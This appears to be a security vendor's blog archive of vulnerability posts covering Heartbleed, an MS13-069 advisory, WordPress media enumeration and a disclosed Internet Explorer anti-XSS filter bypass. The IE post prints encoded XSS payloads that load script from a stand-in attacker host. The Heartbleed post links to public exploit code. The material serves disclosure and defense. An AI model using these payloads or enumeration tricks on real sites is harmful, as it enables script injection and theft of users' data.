Category Archives: Vulnerabilities

A Security Expert’s Thoughts on WhiteHat Security’s 2014 Web Stats Report

Editor’s note: Ari Elias-Bachrach is the sole proprietor of Defensium LLC. Ari is an application security expert. Having spent significant time breaking into web and mobile applications of all sorts as a penetration tester, he now works to try and improve application security. As a former developer who has experience with both static and dynamic analysis he can work closely with developers to try and remediate vulnerabilities. He has also developed and taught secure development classes, and can help make security part of the SDLC. He is a regular speaker on the field of application security at conferences. He can be found on Twitter @angelofsecurity. Given his experience and expertise, we asked Ari to review our 2014 Website Security Statistics Report which was announced yesterday to get his thoughts which he has shared as a guest blog post.

The most interesting and telling chart in my opinion is the Vulnerability class by language chart. I decided to start by asking myself a simple question: can vulnerabilities be dependent on the language used, and if so which vulnerabilities? I did a standard deviation on all vulnerability classes to see which ones had a high degree of variance across the different languages. XSS (13.2) and information leakage (16.4) were the two highest. In other words, those are the two vulnerabilities which can be most affected by the choice of programming language. In retrospect info disclosure isn’t surprising at all, but XSS is a little interesting. The third one is SQLi, which had a standard deviation of 3.8, and everything else is lower than that.

Conclusion 1: The presence or absence of Cross-site scripting and information disclosure vulnerabilities is very dependent on the environment used, and SQLi is a little bit dependent on the environment. Everything else isn’t affected that much.

Now while it seems that frameworks can do great things with respect to security, if you live by the framework, then you die by the framework. Looking at the “Days vulnerability open by language” chart, you can see some clear outliers where it looks like certain vulnerabilities simply cannot be fixed. If the developer can’t fix a problem in code, and you have to wait for an update to the framework, then you end up with those few really high mean times to fix. This brings us to the negative consequences of relying on the framework to take care of security for us – it can limit our ability to make security fixes as well. In this case the HTTP response splitting issue with ASP are both problems that cannot be fixed in the code, but require waiting for the vendor to make a change, which they may or may not judge necessary.

Conclusion 2: Live by the framework, die by the framework.

Also interesting is that XSS, which has the highest variance in occurrence, has the least variance in terms of time to fix. I guess once it occurs, fixing an XSS issue is always about the same level of effort regardless of language. Honestly I have no idea why this would be, I just find it very interesting.

Conclusion 3: Once it occurs, fixing an XSS issue is always about the same level of effort regardless of language. I can’t fathom the reason why, but my gut tells me it might be important.

I found the “Remediation rate by vulnerability class” chart to be perhaps the most surprising (at least to me). I would have assumed that the remediation rates per vulnerability would have been more closely correlated to the risk posed by each vulnerability, however that does not appear to be the case. Even more surprisingly, the remediation rates do not seem to be correlated to the ease of fixing the vulnerability, as measured by the previous chart on the number of days each vulnerability stayed open. Looking at SQLi for example, the remediation rate is high in asp, ColdFusion, .NET, and Java, and incredibly low in PHP and Perl. However PHP and Perl were the two languages where SQLi vulnerabilities were fixed the fastest! Why would they be getting fixed less often than other environments? XSS likewise seems to be easiest to fix in PHP, yet that’s the least likely place for it to be fixed. Perhaps some of this can be explained by a single phenomena – in some environments, it’s not worth fixing a vulnerability unless it can be done quickly and cheaply. If it’s a complex fix, it is simply not a priority. This would lead to low remediation rates and low days to patch at the same time. In my personal (and purely empirical non-scientific) experience, perl and php websites tend to be put up by smaller organizations, with less mature processes and a lesser emphasis on security and a greater focus on continuing to create new features. That may explain why many Perl and PHP vulnerability are either fixed fast or not at all. Without knowing more, my best guess is that many of the relationships here, while correlated, do not appear to be causal. In other words, some other force, like organizational culture, is driving both the choice of language and the remediation rate.

Conclusion 4: Remediation rates do vary across language, but the reasons seem to be unclear.

Final Conclusions
I started off with a very basic question “does choice of programming language matter”, and the answer does seem to be yes. While we all know that in theory there is no vulnerability that can’t exist in a given environment, and there’s no vulnerability that can’t be fixed in any given environment, the real world rarely works as neatly as it should “in theory”. Certain vulnerabilities are more likely in certain environments, and fixes may be easier or harder to apply, which impacts their likelihood of ever being applied. There has been a lot of talk lately about moving security into the framework, and this does provide evidence that this approach can be very successful. However it also shows the risks of this approach if the framework does not implement the right security controls and in the right way.

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and media-covered, vulnerabilities affecting the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to the Heartbleed SSL attack just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public 2 years ago. The implications of 2 years of exposure to this vulnerability are significant, and we will explore that more at the end of this article. First – immediate details:

This attack does not require any MitM (Man in the Middle) or other complex setups that SSL exploits usually require. This attack can be executed directly and anonymously against any webserver/device running a vulnerable version OpenSSL, and yield a wealth of sensitive information.

WhiteHat Security’s Threat Research Center (TRC) began testing customers for vulnerability to this attack immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusions were that the frequency with which sites were vulnerable to this attack was low on production applications being monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% vulnerability rate for all SSL-enabled websites. This may be a result of a biased sample, since we only evaluated applications under Sentinel service. (This may be because application owners who use Sentinel are already more security-conscious than most.)

While the frequency of vulnerability to the Heartbleed SSL attack is low: those that are vulnerable are severely vulnerable. Everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (e.g.-SSL using this cert will never be private again, if compromised)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection Strings (Database userIDs/Passwords) to back-end databases, mainframes, LDAP, partner systems, etc. loaded in memory
  • Additional vulnerabilities in source code, that are loaded into memory, with precise locations (e.g.-Blind SQL injection)
  • Basically any code or data in memory on the server running a vulnerable version of OpenSSL is rendered in clear-text to all attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to Heartbleed SSL attack, out of initial sample of 18,000 production applications. We find an initial 1.9% average exploitability but this percentage appears to drop rapidly in the next 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on with small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any device or application on your internal network that is vulnerable. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL
  • Agents exploiting internal devices will see all network traffic or application data in memory on the affected device/application

Due to the fact that most of these internal applications and devices lack the type of logging and alerting that would notify Information Security teams of active abuse of this vulnerability, our concern is that in coming months these internal devices & applications may provide rich grounds for exploitation that may never be discovered.

Conclusion & Recommendations:
The scope, impact, and ease-of-exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the impact risk of patching seems minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to 2 years in OpenSSL implementations. We will likely never know if anyone has been actively exploiting this vulnerability, due to difficultly in logging/tracking attacks. If your organization is concerned about this, we recommend that — in addition to patching this vulnerability — SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords be changed on suspect systems.

Is this vulnerability a “boy that cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html/

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Heartbleed OpenSSL Vulnerability

Monday afternoon a flaw in the way OpenSSL handles the TLS heartbeat extension was revealed and nicknamed “The Heartbleed Bug.” According to the OpenSSL Security Advisory, Heartbleed reveals ‘a missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.’ The flaw creates an opening in SSL/TLS which an attacker could use to obtain private keys, usernames/passwords and content.

OpenSSL versions 1.0.1 through 1.0.1f as well as 1.0.2-beta1 are affected. The recommended fix is upgrade to 1.0.1g and to reissue certs for any sites that were using compromised OpenSSL versions.

WhiteHat has added testing to identify websites currently running affected versions. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. These tests are currently being run across all of our clients’ applications. We expect to get full coverage of all applications under service within the next two days. WhiteHat also recommends that all assets including non-web application servers and sites that are currently not under service with WhiteHat be tested. Several tools have been made available to test for open issues. To access an online testing tool visit http://filippo.io/Heartbleed/. Another tool can be found on GitHub at https://github.com/titanous/heartbleeder and a new script can be obtained from http://seclists.org/nmap-dev/2014/q2/36

If you have any questions regarding the Heartbleed Bug please email support@whitehatsec.com and a representative will be happy to assist. Below you will find a link to the OpenSSL Security Advisory: https://www.openssl.org/news/secadv_20140407.txt Reference for Heartbeat extension https://tools.ietf.org/html/rfc6520

Re: Mandated Third Party Static Analysis: Bad Public Policy, Bad Security

Mary Ann Davidson wasn’t shy making her feelings known about scanning third-party software in a lively blog post entitled “Mandated ThirdParty Static Analysis: Bad Public Policy, Bad Security“. If you haven’t read it and you are in security, I do recommend giving it a read. Opinionated and outspoken, Mary Ann lays out her case for not scanning third-party software. In this case, although I don’t totally agree with each individual point, I do agree with the overall conclusion.

Mary Ann delineates many individual reasons organizations should not scan third-party COTS (Commercial Off The Shelf) software. The reasons include non-standard practice, vendors already scan, little-to-no ROI, harm to the product’s overall security, increased risk to other clients, uneven access to security information, and risks to IP protection. I think the case can actually be greatly simplified. Scanning COTS software is simply a waste of time because that is not where most organizations are going to find and reduce risk.

Take web applications, which is at the top of every CISO’s usual list of suspects for risk. Should every organization on the web perform a complete security review of every single layer in this technology stack? Or how about mobile? Should an organization perform a complete review of iOS and Android before writing a mobile app or allowing employees to use mobile phones? I’m sure the consulting industry would love this, but this is simply not feasible for organizations of any size.

So what are we to do? In my opinion, a security team should strive to measure and mitigate the greatest amount of risk to an organization within it’s budgetary and time limitations, enabling business to innovate with a reasonable amount of security assurance. For the vast majority of applications, that formula is going to lead directly to their own custom-written or custom outsourced software; specifically, their web applications.

Most organizations have a large number of web apps, a percentage of which will have horrific vulnerabilities which put the entire organization at risk. These vulnerabilities are well-known, very prevalent, and usually straightforward to remediate. A security program that provides continuous assessment for all the code written and/or commissioned by your organization both during development and deployment should be the front line of security for nearly every organization with a presence on the web, as it normally finds a trove of preventable risk that would otherwise be exploitable to attackers on the web.

So what is the problem with scanning our custom code and third-party COTS software? It is a misallocation of resources. Unless you have unlimited budget and time, you are much better off focusing and evaluating your custom-written source code for vulnerabilities, which can be ranked by criticality and mitigated by your development team.

Again, that is not to say there are no risks in using COTS software. Of course there are. All software has vulnerabilities. Risks are present in every level of a technology stack. For example, a web app may depend on a BIOS/UEFI, an OS, a web server, a database server, an application server, multiple server-side frameworks, multiple client-side frameworks, and many other auxiliary programs.

But the likelihood of your organization performing yet another evaluation of software that has most likely already gone through a security regimen is exponentially less effective in managing risk than focusing more of your security resources on building a more robust security program around your own in-house custom software.

Well, what should we do to mitigate third-party risk? The most overlooked and basic security precaution is to have a full manifest of all third-party COTS and open-source code running in your environment. Few, if any organizations have a full listing of all third-party apps and libraries they use. Keeping an account of this information, and then doing frequent checks for security updates and patches for this third-party code is obvious and elementary, but almost always universally overlooked.

This basic security formula of continuous scanning of custom applications, checking third-party libraries for security updates, and using this information to evaluate the biggest risks to your organization and working to mitigate the most severe risks would have prevented most of the successful web attacks that make daily headlines.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword: >

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings are not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market share leading browsers cannot do this adequately. This is an every day threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, even asked us what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent-updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations that websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the amount of session states you have open – due to an intentional lack of persistence in the browser over different sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be connected to from the outside (NAT). Exploitation may lead to simple reconnaissance of internet networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible to block any bit of Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to be able to get to, Connection Control allows the user to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well-known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite, “Search anonymously. Find instantly.” We felt that that was a much better default option. Of course if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers will tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so could possibly leak sensitive information such as the search keywords used, internal IPs/hostnames, session tokens, etc. These leaks are often caused by the referring URL and offer little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (E.g. Flash and Java) are a source for tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection. Your browser might be secure, but the plug-ins are not and one must update constantly. Then of course all those annoying sounds and visuals made by plug-ins which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just one-click on the puzzle piece. If you want a website to always load the plug-ins, that’s a configuration change as well. “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / login to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we have defaulted to DuckDuckGo as a search engine, we have limited what is sent in the browser to Google to protect your privacy. If you chose to use Google services, that is your choice. If you chose not to though, it can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track”, we figure it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.

We so far have appreciated the response to WhiteHat Aviator and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Browser Wars to Browser Foes – MS13-069

Microsoft has just published a high-level threat 0-day vulnerability for all versions of Internet Explorer 6.0 and greater and affecting all operating system higher then Windows XP service pack 3. This vulnerability uses a corrupted memory object to remotely execute code that runs on the victim’s machine with the current users privileges. More information about how the vulnerability is exploited can be found at Microsoft here.

All that is required from the victim is to click a malicious link hosted by the attacker to become exploited; this in turn runs the attacker’s executing code and gives the attacker access to the machine.

This attack can still be sent through social media sites, chat messages, email, and malicious websites. As a precaution it may be wise to change the default browser to something other than Internet Explorer until the affected machine is patched. The instructions from Microsoft to change the default browser here Windows 7 And Windows XP.

The scope of users affected is very high, since the Microsoft Windows Operating Systems and Internet Explorer have been the de facto standard for more then a decade. Since Internet Explorer ships as the only browser in Windows it’s very easy not to bother installing a different browser. Internet Explorer users still make up roughly a third of browser usage average, when comparing Internet Explorer to Chrome and Firefox.

Internet Explorer on Windows Servers above 2003 are at a lower risk because they run in a default enhanced security configuration, and it’s strongly discouraged in security to be browsing the internet from Windows server or any server for that matter.

Solution:

Patching can be a hectic task for admins that are using Internet Explorer dependently, but should be done immediately to prevent exposure.

The official instructions from Microsoft Suggested Actions:

General Information for all users

Enhanced Mitigation Experience ToolKit

Here are some statistical results showing the popularity/average browser and operating usage across the world:

https://www.statcounter.com

https://www.netmarketshare.com

https://www.w3counter.com

https://www.sitepoint.com


Reducing Security

Jeremiah Grossman and I were chatting (yes, we talk quite often) at BlackHat about how it seems like no matter what we do in the security space it is reducible to being insecure/vulnerable in some way or another. So Jeremiah suggested that I should make a funny graphic depicting how that’s true.

Well, that turned out to be easier said than done. As I got further and further into it, I found that it wasn’t really that funny. In fact, it became less-funny and more of a bummer the more I got into it. I know this isn’t perfect or complete, but it gives you an idea of the amazing amount of things you’ve got to get right before you can be sure your site is safe.

Click to enlarge.

Click to enlarge.

Hopefully after you look at it you’ll see what I mean. What was once a pretty funny idea turned into a bit of a nightmare. Still, I suppose there is a bit of gory humor buried deep within it all. Okay, I’m going to go away and grow carrots now.

Information Leakage in WordPress

WordPress suffers from a fairly minor flaw that may be used by attackers without much difficulty. WordPress flaws have been numerous over the years – everything from command injection or SQL injection to XSS and CSRF. One of my favorite issues has always been information leakage because it’s the one that’s always marked as low severity and that no one ever takes seriously. That said, it’s still an exploit that could be disastrous in some circumstances.

WordPress has an upload process for media that is separate from the blog posting process. As such they aren’t governed by the same rules concerning authorization. Once something is uploaded as media it is instantly visible on the site, regardless of whether the blog post has been posted yet or not.

Additionally, the URLs used by the blog are extremely easy to brute force because they are always larger than the last attachment_id by some amount. The actual number is based on how many posts are in the database and not just on media, so it does take a tiny bit of work to know when to stop looking. But the URLs are consistently like this:

/?attachment_id=4
/?attachment_id=130
/?attachment_id=131
/?attachment_id=249

Now you’re asking yourself, so what? The problem is that because the timing between the media and the blog post isn’t identical you can end up in a race condition with the content. For instance, let’s say you run a publicly traded company and you are about to release your earnings report on your blog. You may upload a PDF of the earnings report a day or multiple days in advance to make sure everything is perfect and ready to go when you announce. In this case the adversary can guess the URL for the PDF of your earnings report and download it potentially days in advance. This would allow them to trade in advance of your company’s earning reports.

Another example is where a blog post is internally contentious and needs a lot of editing. It may take months for a big company to decide that a post is ready to go. But in that timeframe an attacker may identify the cited uploaded media – images, movies, PDF documents, Word documents, Excel spreadsheets, HTML and so on. This can give an adversary a great deal of information before you’re ready to disclose it. This can be used for anti-competitive practices, or simply to predict the features of the next gadget your company is producing.

So yes, minor issue, but definitely one to be aware of if you use WordPress.

Blind SQL Injection – What is it Good For?

